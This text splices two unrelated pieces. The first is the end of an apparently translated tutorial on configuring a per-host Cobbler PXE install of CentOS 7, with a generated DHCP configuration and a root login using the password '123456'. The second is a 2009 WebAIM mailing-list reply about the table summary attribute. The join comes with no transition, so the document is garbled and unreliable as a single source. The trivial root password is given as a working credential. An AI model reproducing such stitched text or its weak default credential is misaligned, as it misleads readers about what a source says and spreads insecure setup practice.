--profile=CentOS-7.6-x86_64 \
--ip-address=192.168.1.163 \
--subnet=255.255.255.0 \
--gateway=192.168.1.1 \
--interface=eth0 \
--static=1 \
--hostname=Jaking-custom \
--name-servers="192.168.1.1" \
--kickstart=/var/lib/cobbler/kickstarts/CentOS7.ks
List the registered systems:
[root@Jaking kickstarts]# cobbler system list
Jaking-custom
Sync the Cobbler configuration:
[root@Jaking kickstarts]# systemctl restart cobblerd
[root@Jaking kickstarts]# cobbler sync
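Optionally, verify that the per-host record was stored as intended. The system report subcommand is part of Cobbler's standard CLI; its output (the full stored record, including MAC, IP, and kickstart) is omitted here:
[root@Jaking kickstarts]# cobbler system report --name=Jaking-custom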
Check the DHCP configuration: the DHCP server has picked up the IP-to-MAC mapping.
[root@Jaking kickstarts]# cat /etc/dhcp/dhcpd.conf
# ******************************************************************
# Cobbler managed dhcpd.conf file
# generated from cobbler dhcp.conf template (Sat Jan 4 10:52:04 2020)
# Do NOT make changes to /etc/dhcpd.conf. Instead, make your changes
# in /etc/cobbler/dhcp.template, as /etc/dhcpd.conf will be
# overwritten.
# ******************************************************************
ddns-update-style interim;
allow booting;
allow bootp;
ignore client-updates;
set vendorclass = option vendor-class-identifier;
option pxe-system-type code 93 = unsigned integer 16;
subnet 192.168.1.0 netmask 255.255.255.0 {
option routers 192.168.1.1;
option domain-name-servers 114.114.114.114;
option subnet-mask 255.255.255.0;
range dynamic-bootp 192.168.1.100 192.168.1.254;
default-lease-time 21600;
max-lease-time 43200;
next-server 192.168.1.7;
class "pxeclients" {
match if substring (option vendor-class-identifier, 0, 9) = "PXEClient";
if option pxe-system-type = 00:02 {
filename "ia64/elilo.efi";
} else if option pxe-system-type = 00:06 {
filename "grub/grub-x86.efi";
} else if option pxe-system-type = 00:07 {
filename "grub/grub-x86_64.efi";
} else if option pxe-system-type = 00:09 {
filename "grub/grub-x86_64.efi";
} else {
filename "pxelinux.0";
}
}
}
# group for Cobbler DHCP tag: default
group {
host generic1 {
hardware ethernet 00:50:56:3E:F0:C6;
fixed-address 192.168.1.163;
option host-name "Jaking-custom";
option subnet-mask 255.255.255.0;
option routers 192.168.1.1;
filename "/pxelinux.0";
next-server 192.168.1.7;
}
}
# The custom host entry above is the newly added configuration
Power on: the specified system installs automatically
The installation proceeds immediately with no manual input, and the network parameters are pre-configured.
Log in with root and 123456 (the password defined on the server side):
The host with MAC address 00:50:56:3E:F0:C6 has received the assigned IP 192.168.1.163
Original article: https://www.linuxprobe.com/cobbler-customize-system.html
WebAIM E-mail List Archives
Re: does TH scope go along with TH span?
From: Simius Puer
Date: Nov 24, 2009 9:35AM
That's great Geof - thanks for the feedback. Any other AT users with input
on/experience with the summary attribute?
I'm not surprised that you haven't run into the attribute being used very
often - it's not a well known one and it's often misunderstood. The
replication of the text should not really happen if the guidelines are
followed as the summary should be both brief and descriptive of the
structure of the table - not something that should really be included in the
visual text too, but I do see where you are coming from.
The problem you mentioned about abuse of alt tags on images is commonly caused by a CMS that has been either mis-configured or misunderstood by its users. Replication of the text is the result.